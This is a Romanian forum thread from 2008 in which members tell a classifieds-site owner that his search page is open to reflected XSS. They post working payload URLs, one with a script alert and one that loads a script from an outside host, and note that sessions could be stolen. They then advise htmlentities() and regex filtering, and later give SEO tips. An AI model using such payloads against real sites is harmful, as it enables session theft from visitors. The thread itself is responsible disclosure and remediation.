Bun venit pe SkullBox!

Bine ai venit, Vizitator. Trebuie să te autentifici sau să îţi creezi un cont.
Ai pierdut sau nu ai primit emailul care conţine codul de activare al contului?

Autentifică-te cu numele de utilizator, parola şi precizează durata sesiunii.
  Pagini: 1 [2]
  Imprimă  
URL rewrite  (Vizualizari 1062)
stynky1
*

Deconectat Deconectat

Mesaje: 72

WWW
URL rewrite, Aug 01, 2008, 17:47

Era de neatentie mai mult. Incurcam afisarile intre ele...
Memorat
Hertz
*

Deconectat Deconectat

Mesaje: 79

URL rewrite, Aug 02, 2008, 23:20

Off: Siteul e vulnerabil XSS Big grin
Memorat
stynky1
*

Deconectat Deconectat

Mesaje: 72

WWW
URL rewrite, Aug 02, 2008, 23:23

Adica?

Da-mi mai multe detalii, pentru ca sincer sunt interesat.

Multam ptr replay!
Memorat
Hertz
*

Deconectat Deconectat

Mesaje: 79

URL rewrite, Aug 02, 2008, 23:29

Cod:
http://www.web-anunturi.ro/index.php?Search=%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E&Cauta=Cauta

Baga un htmlentities().
« Ultima modificare: Oct 10, 2008, 06:31 de către emi » Memorat
Agkelos
*

Conectat Conectat

Mesaje: 5231

WWW
URL rewrite, Aug 02, 2008, 23:30

Citat din mesajul lui: webanunturi
Adica?

Da-mi masi multe detalii, pentru ca sincer sunt interesat.
Nu sanitizezi variabilele folosite. Da-i sa caute <script>alert(1)</script>. Identic se pot injecta alte coduri JavaScript pentru furtul de sesiuni.

Foloseste htmlentities() sau, mai bine, expresii regulate ca sa elimini din sirul de cautare toate caracterele care nu au ce cauta acolo ( ex. <, >, (, ) etc).
« Ultima modificare: Oct 10, 2008, 06:31 de către emi » Memorat



Problemele se rezolva pe forum. Nu trimiteti PM ca nu va ajut.
Pentru urgente, skullbox at skullbox . info.
Hertz
*

Deconectat Deconectat

Mesaje: 79

URL rewrite, Aug 02, 2008, 23:37

Off: Legat de sesiuni,uite... http://www.web-anunturi.ro/index.php?Search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3F%3CB%3E&Cauta=Cauta
Memorat
stynky1
*

Deconectat Deconectat

Mesaje: 72

WWW
URL rewrite, Aug 02, 2008, 23:42

Ok am sa fac astea...
10x ptr replay. Va anunt cand e gata, pentru alte pareri:P.
Memorat
stynky1
*

Deconectat Deconectat

Mesaje: 72

WWW
URL rewrite, Aug 03, 2008, 12:11

Gata, am bagat htmlentities.
 Alte sfaturi mai aveti:D?
Memorat
Agkelos
*

Conectat Conectat

Mesaje: 5231

WWW
URL rewrite, Aug 03, 2008, 12:18

Citat din mesajul lui: webanunturi
Alte sfaturi mai aveti:D?
M-am uitat prin meniu si am vazut ca toate linkurile sunt catre /anunturi-c[0-9].html. Ar fi bine daca le-ai face de forma /anunturi-(sectiune)-c[0-9].html. Ar aparea cuvantul cheie in numele fisierului ceea ce te ajuta atat in SERP cat si la AdSense.

O alta chestie, titlul si descrierea sunt identice pe toate paginile (sau cel putin pe cele cateva pe care m-am uitat). Asta e foarte rau pentru crawlere. Fiecare pagina trebuie sa aiba identitate proprie.
Memorat



Problemele se rezolva pe forum. Nu trimiteti PM ca nu va ajut.
Pentru urgente, skullbox at skullbox . info.
stynky1
*

Deconectat Deconectat

Mesaje: 72

WWW
URL rewrite, Aug 03, 2008, 16:01

Partea proasta la toata faza asta e ca site-ul e facut cu sabloane smarty, si sincer m-am gandit ca ar trebui sa schimb cuvintele cheie , dar inca nu mi-a venit o idee cum as putea sa fac acest lucru. In admin am un camp pentru cuvinte cheie, dar inca ma gandesc cum as putea sa le schimb , pentru fiecare categorie principala in parte.

Referitor la faza cu linkurile o sa ma gandesc in seara asta si cred ca o sa o rezolv destul de repede.

10x pentru sfat
Memorat
SkullAds
Ecspert
ReclAmator
* * * * *
Google AdSense

Gen: Bărbat
Mesaje: Multe

Reclama AdSense,
 

 
   


Pagini: 1 [2]
  Imprimă  
 
Schimbă forumul:  

Ethical hacking and programming community
Powered by SMF 1.1.7 | SMF © 2006-2008, Simple Machines LLC
Traducerea în limba română © 2006-2007 www.smf.ro